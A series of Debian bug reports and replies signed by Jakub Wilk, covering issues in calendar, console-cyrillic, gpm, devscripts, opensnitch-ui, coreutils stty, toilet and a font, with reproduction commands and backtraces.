* Ritesh Raj Sarraf , 2023-01-20 16:59: The current upstream documentation does warn about the functionality, and does not advertise anything about confining the namespace. Er, but it does talk about confinement: Hostfs without any parameters to the UML Image will allow the image to mount any part of the host filesystem and write to it. Always confine hostfs to a specific "harmless" directory (for example ``/var/tmp``) if running UML. This is especially important if UML is being run as root. -- Jakub Wilk
Bug#1009187: calendar: Outdated entry "Jul 22 National Day in Poland"
* Andrzej A. Filip , 2022-04-08 15:14: "Jul 22 National Day in Poland" is no longer valid. [File /usr/share/calendar/calendar.holiday line 302 ] How embarrassing. It was a communist holiday, which was abolished in 1990: https://en.wikipedia.org/wiki/National_Day_of_the_Rebirth_of_Poland As a data point, OpenBSD fixed this in 2006: https://github.com/openbsd/src/commit/7eadb65f7d736d8a -- Jakub Wilk
Bug#1030816: displayfont turns off UTF-8 mode
Package: console-cyrillic Version: 0.9-17.2 Apparently displayfont(1) turns off the UTF-8 mode: $ printf $'\u263A\n' # U+263A WHITE SMILING FACE ☺ $ displayfont | tail -n1 $ printf $'\u263A\n' âÿº -- Jakub Wilk
Bug#1030808: calendar: mojibake "C=E9dric"
Package: calendar Version: 12.1.7+nmu3 Severity: minor I saw this mojibake in today's calendar: $ calendar | grep Boutillier Feb 07 Debian Bug#70 reported by C=E9dric Boutillier, 2013 It should be "Cédric". -- System Information: Architecture: i386 Versions of packages calendar depends on: ii libbsd0 0.11.7-2 ii libc62.36-8 ii cpp 4:12.2.0-3 -- Jakub Wilk
Bug#610882: gpm: Unclear messages in syslog
* Helge Kreutzmann , 2011-01-23 18:23: In the syslog I see messages like: /usr/sbin/gpm[3519]: Request on 8 (console 10) Another annoyed user here. This seems to be emitted in src/daemon/processrequest.c, at the beginning of function processRequest. To reproduce, just run mc(1). If these messages are harmless As far as I can see, they are harmless. -- Jakub Wilk
Bug#968388: build-rdeps: with dose-extra, lists too many rdeps
* Christian Kastner , 2020-08-14 10:58: Given the command `build-rdeps python3-pygments`, without package dose-extra installed, I get a warning WARNING: dose-extra >= 4.0 is not installed. Falling back to old unreliable behaviour. and it produces a reasonable 73 packages as output. With dose-extra installed, the same command produces 1,748(!) packages, which cannot be true. Most of them build-depend on python3-sphinx, which depends on python3-pygments. In my experience, you almost always want --old. -- Jakub Wilk
Bug#1030141: build-rdeps man page: undocumented -q
Package: devscripts Version: 2.22.2 The -q option is not documented in the build-rdeps(1) man page. (Only --quiet is.) -- Jakub Wilk
Bug#1030115: opensnitch-ui: AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate'
Package: python3-opensnitch-ui Version: 1.5.3-1 Severity: grave Control: forwarded -1 https://github.com/evilsocket/opensnitch/issues/821 opensnitch-ui does not start: $ opensnitch-ui Themes not available. Install qt-material if you want to change GUI's appearance: pip3 install qt-material. Traceback (most recent call last): File "/usr/bin/opensnitch-ui", line 23, in from opensnitch.service import UIService File "/usr/lib/python3/dist-packages/opensnitch/service.py", line 17, in from opensnitch.dialogs.stats import StatsDialog File "/usr/lib/python3/dist-packages/opensnitch/dialogs/stats.py", line 18, in from opensnitch.customwidgets.main import ColorizedDelegate, ConnectionsTableModel File "/usr/lib/python3/dist-packages/opensnitch/customwidgets/main.py", line 11, in class ColorizedDelegate(Qt.QItemDelegate): AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate' -- System Information: Architecture: i386 Versions of packages python3-opensnitch-ui depends on: ii debconf 1.5.82 ii libqt5sql5-sqlite5.15.8+dfsg-2 ii python3-grpcio 1.51.1-3 ii python3-notify2 0.3-5 ii python3-pyinotify0.9.6-2 ii python3-pyqt55.15.8+dfsg-1 ii python3-pyqt5.qtsql 5.15.8+dfsg-1 ii python3-setuptools 66.1.1-1 ii python3-six 1.16.0-4 ii python3-slugify 4.0.0-2 ii python3 3.11.1-3 ii dialog 1.3-20221229-1 -- Jakub Wilk
Bug#1018958: coreutils: stty default output doesn't actually show "deviations from stty sane" for c_cc[VTIME] and c_cc[VMIN]
Another setting that stty without arguments doesn't show is ixon: $ sh -c 'stty sane; stty ixon; stty; stty -ixon; stty; stty sane' speed 38400 baud; line = 0; speed 38400 baud; line = 0; -- Jakub Wilk
Bug#1029150: toilet -E troff: Segmentation fault
Package: toilet Version: 0.3-1.4 "toilet -E troff" crashes: $ toilet -E troff foo Segmentation fault Backtrace: #0 __GI_strlen () at ../sysdeps/i386/i586/strlen.S:50 #1 0xf7c5f7a9 in __vfprintf_internal (s=0xd28c, format=0xf7f93ba0 "\\M[%s]", ap=, mode_flags=6) at ./stdio-common/vfprintf-process-arg.c:397 #2 0xf7c75821 in __vsprintf_internal (string=0x56565f4d "\\M[ ", maxlen=4294967295, format=0xf7f93ba0 "\\M[%s]", args=0xd390 "\001", mode_flags=6) at ./libio/iovsprintf.c:96 #3 0xf7d31532 in ___sprintf_chk (s=0x56565f4d "\\M[ ", flag=1, slen=4294967295, format=0xf7f93ba0 "\\M[%s]") at ./debug/sprintf_chk.c:40 #4 0xf7ee9fdb in sprintf (__fmt=0xf7f93ba0 "\\M[%s]", __s=0x56565f4d "\\M[ ") at /usr/include/i386-linux-gnu/bits/stdio2.h:38 #5 export_troff (bytes=0xd438, cv=0x56564ae0) at codec/export.c:1056 #6 caca_export_canvas_to_memory (cv=0x56564ae0, format=0xd82a "troff", bytes=0xd438) at codec/export.c:136 #7 0x56556a5d in render_flush (cx=cx@entry=0xd4ec) at ./src/render.c:157 #8 0x56556d9b in render_list (cx=0xd4ec, argc=1, argv=0xd630) at ./src/render.c:128 #9 0x5655686f in main (argc=4, argv=0xd624) at ./src/main.c:194 -- System Information: Architecture: i386 Versions of packages toilet depends on: ii libc6 2.36-8 ii libcaca0 0.99.beta20-3 ii toilet-fonts 0.3-1.4 Versions of packages toilet suggests: ii figlet 2.2.5-3 -- Jakub Wilk
Bug#1029106: make: new upstream release (4.4)
Source: make-dfsg Severity: wishlist -- Jakub Wilk
Bug#1025267: Nimbus Roman: wrong glyph for ₤ (U+20A4 LIRA SIGN)
* Fabian Greffrath , 2022-12-01 21:21: Would you please do me a favor and forward this issue to the upstream git tracker? Don't count on me. Sorry! -- Jakub Wilk